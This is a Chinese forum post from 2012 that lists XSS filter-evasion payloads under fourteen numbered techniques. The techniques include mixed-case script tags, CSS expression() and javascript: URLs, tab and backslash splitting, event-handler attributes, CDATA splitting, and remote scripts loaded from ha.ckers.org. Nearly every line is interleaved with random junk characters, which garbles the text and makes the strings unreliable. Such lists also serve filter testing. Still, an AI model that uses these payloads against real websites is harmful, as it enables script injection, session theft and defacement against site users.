1. 改变字符大小写
" h- r0 \, H6 |7 P: ?, U
1 I# ]4 m7 `5 M, s! x - ?, G5 L _( Y \- C
+ W* }# T1 Y! ^. k% d1 U6 p9 [ <sCript>alert(‘d’)</scRipT>( O$ u: y& h8 M
% F# c% S2 W" ^ M% X! {& R2. 利用多加一些其它字符来规避Regular Expression的检查
1 C8 u0 x( d4 c
- H6 t: X! g! n( H# L <<script>alert(‘c’)//<</script>( m T2 B+ c6 M0 n5 p
1 M* c1 t; o) B" r" _ <SCRIPT a=">" SRC="t.js"></SCRIPT>
5 {8 S4 a5 C: ^' ?2 ?5 o, Q3 N6 o3 \" t
<SCRIPT =">" SRC="t.js"></SCRIPT>- h& g; e r8 B7 N
/ [ f1 W; D+ d& m <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
, @+ a# m, C3 Q+ U5 Q
/ w0 s) A# Y# I$ S9 i! I# t <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>, D* T8 q4 K6 Z! E' p$ `. Z. {
, W. o. R5 F) X" |( {
<SCRIPT a=`>` SRC="t.js"></SCRIPT>! g5 k, H9 t5 j/ X7 P
y2 g2 ~) T& v u" x: Y( i; v
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
4 N6 v) l$ h0 |7 Y
$ m3 }# }6 ^ O$ ?1 c( b3. 以其它扩展名取代.js
; _! V. ^ Q" l8 H5 h% ?1 {
9 o6 U O1 O& Q0 R0 O. t <script src="bad.jpg"></script>
% H2 I& g( S* O& ~& V# C0 {" |
' I! {' A, A( i+ X4. 将Javascript写在CSS档里
2 E3 u7 Y0 Q% { |8 W! O
0 `8 C9 l7 G7 e8 N* b7 I <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">" v; w. L' w& a( z5 [; M' P
+ T- U, `3 N2 f7 P$ Q5 w
example:9 T) R4 P0 J+ u% D
& `6 S+ k2 V/ a# x/ t* x
body {2 Y! Y) Q! J6 f7 _+ m
) n8 Z' ^' E- r/ A; _2 n7 j f( n* F) Y background-image: url(‘javascript:alert("XSS");’); I. c( B% @& D! a I
% i. c D) X* ?0 E3 @ }
|: F# e1 o2 A% ^* }% g
6 A2 G F% ^0 F0 m; [5 K( m! q5. 在script的tag里加入一些其它字符
! l+ Q" }& Q/ `! `
$ o. m- d$ V: l <SCRIPT/SRC="t.js"></SCRIPT>" P' D8 ^; ~+ b5 C
1 w2 L) Y8 r2 J9 a! S1 q
<SCRIPT/anyword SRC="t.js"></SCRIPT>
% L4 d; Y. ~: x% F
0 j* c! { w6 e( S2 r6. 使用tab或是new line来规避& s4 q9 k( A" O: R6 c
- D5 C$ l& r7 W5 K' S <img src="jav ascr ipt:alert(‘XSS3′)">
3 w: K) t4 T2 k9 X( u/ _& F- n. J+ I2 r6 n+ \1 V& K! G3 r
<img src="jav ascr ipt:alert(‘XSS3′)">
% ]- Q- V; Y) |1 m3 Z
& h1 C, X& g/ l2 @& f% u* s c <IMG SRC="jav ascript:alert(‘XSS’);">
3 ~' {0 P2 u2 ~( P/ T% S2 o' V/ R# o! u7 O+ w; Z" q6 A% o$ i
-> tag+ T8 c0 Q! A& i/ p' V
8 K2 Y+ d3 `, w1 I- Q -> new line
9 L, {& U8 W" r6 A
- G" g2 q5 ~# ^1 O, U) M% B3 ^7. 使用"\"来规避
) s5 [( r* X/ A5 n0 a/ J! M: X* s6 n, d
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
0 ?. m: \ d8 I7 e2 U; Y+ f6 `( Z+ y6 s$ p
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>0 j; k3 e$ b- a" o2 U- m6 B r( H3 x, |& a
3 _ @& X' L4 n$ ?$ c4 f <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
& d) {* W" d5 l- ?' R/ C5 \8 G
3 S( \5 Q, w+ e- e1 R) M5 [ <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">" C2 H7 R( ~& p: ]) t
. R: u0 I& f/ d( \, g
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>/ w8 g, h) j4 v7 P; `
6 m% X: p' f$ l' ]7 m0 r2 Y8. 使用Hex encode来规避(也可能会把";"拿掉)$ z: r( y, d+ _( n# t8 e3 I6 H
$ C0 m/ F3 T# m. l" y <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
4 Z# m1 Q! C: J& I+ Q+ b2 u1 H$ ]3 f3 C, R% ~ h# ~2 u
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">. e' @7 r& f- a: f6 Z$ f' P
& L% T5 U7 r1 F* K( h8 f3 @$ I
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">- e* L N( f+ H3 R
5 ]/ `1 U9 E' K) U
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">5 O) F3 a. R, {# u9 G8 P; K
, U9 k- T/ f) t4 b# e
9. script in HTML tag
" q7 I5 O( c6 r" l9 ?( S l" J1 s8 U# S4 s0 q
<body onload=」alert(‘onload’)」>
3 X3 T! i% V6 [' n J& J6 D* U* |$ ~" }/ q5 A
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload5 N% p: \* c. @
. G3 j: t$ F/ E; F* w5 n10. 在swf里含有xss的code
2 O Q, U0 {% j, l# G
h* g9 a% n" d' b* ]8 J, q6 E <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
7 t. |* F% c8 v4 [8 X1 E" Q4 _* B$ v" N+ W8 [' w$ ?
11. 利用CDATA将xss的code拆开,再组合起来。2 p6 G9 F' V+ ~; U9 ~2 q) K
( [5 n: E6 F ~9 g+ J
<XML ID=I><X><C>
1 Z3 t! t! n' v1 }+ d
1 @( e# ]( k1 c& d+ J; E <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
6 T2 [- i" l' d8 \ I+ y/ P H6 e8 O. m, o+ ~6 D
</C></X>% [$ G' h$ q3 L7 \6 K* P& O; N
9 ]" I8 I7 o$ f8 R- v </xml>) m3 N+ |( ?1 w. P
6 E/ Z1 m2 v2 z! p8 g; Y' \
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
% T9 T% X. e# \0 k2 d* Z' A
% u4 Q. f3 y4 k% Q% g! ]0 q! G <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
7 \$ S: F. x4 a" c- c0 w
2 q. f% n8 R7 A5 G6 D P <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
; W& {: `4 A6 J `8 l9 p. J0 H4 O E* _8 R; S) } H
12. 利用HTML+TIME。
0 u/ J) D- Z+ ?6 x1 M! B4 V9 m' e5 G
* n2 [9 I5 I0 G+ \ <HTML><BODY>9 B% E. J7 M! t% J
5 j8 r9 y; I& h- K- `2 J1 Q' A( p <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"># l' @, ]& F! m* w4 O# P& b
, [! \! {0 D# {! {5 Q% p <?import namespace="t" implementation="#default#time2">
* o0 P9 c. v- U& I1 c# z6 A5 Z2 A1 E0 G( ?# X
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
6 v( L$ }# r9 F0 \9 f; m
$ |7 I1 v% n: L$ z8 a: t </BODY></HTML>6 b0 I: O: O; Y3 c4 ?* }9 e
8 j( [/ [3 i& {2 v- ]6 |
13. 透过META写入Cookie。- o$ f$ T5 b* |2 U2 \
, U+ t+ J1 l: }, k: ] <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">$ g' x0 D, ], P. g* {
o; F! `4 R) G7 h! v! E14. javascript in src , href , url
4 b( v; }: \$ B2 k/ [2 k
, G* J) G e, v- w4 u <IFRAME SRC=javascript:alert(’13′)></IFRAME>& @/ }0 e6 j: M; j
( ^. @/ z3 x7 y
<img src="javascript:alert(‘XSS3′)">
6 O" v, D7 H, l6 j# b8 t1 C" M1 u& ~
<IMG DYNSRC="javascript:alert(‘XSS20′)">
; I, U8 _; U& q1 m0 y8 m# p
8 I& m& p% X% x9 [5 R0 C! P <IMG LOWSRC="javascript:alert(‘XSS21′)"> a& I5 \. _, i/ O2 m8 M
; p/ t/ J: I, I8 Z' W D' S# K9 k
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
: z$ |$ ^6 u( ]4 Z7 |+ b* U- s ?9 N0 k* ^( e+ s9 Z
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>, M I, I: }9 j5 P7 _- h
2 j4 o; T: b' j" T% E7 Q; b <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
/ {3 H! l. u1 l9 H7 Z
: ^: W$ u% ]% e <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">' R( J1 @1 [4 A3 a- L
. j7 _( z0 m8 Q& o
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}7 V$ W7 X3 Q- y
; \' Y4 r% d) e/ ~ </STYLE><A CLASS=XSS></A>8 J" H/ ?" U m+ X& {$ k1 T( n
C9 l+ k/ Y U1 v
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
+ _9 k3 Y6 Q+ `7 M# J
?1 D9 A! n( X" {5 s! u8 V/ G |
发表于 2012-12-31 09:59:28
收藏
支持
反对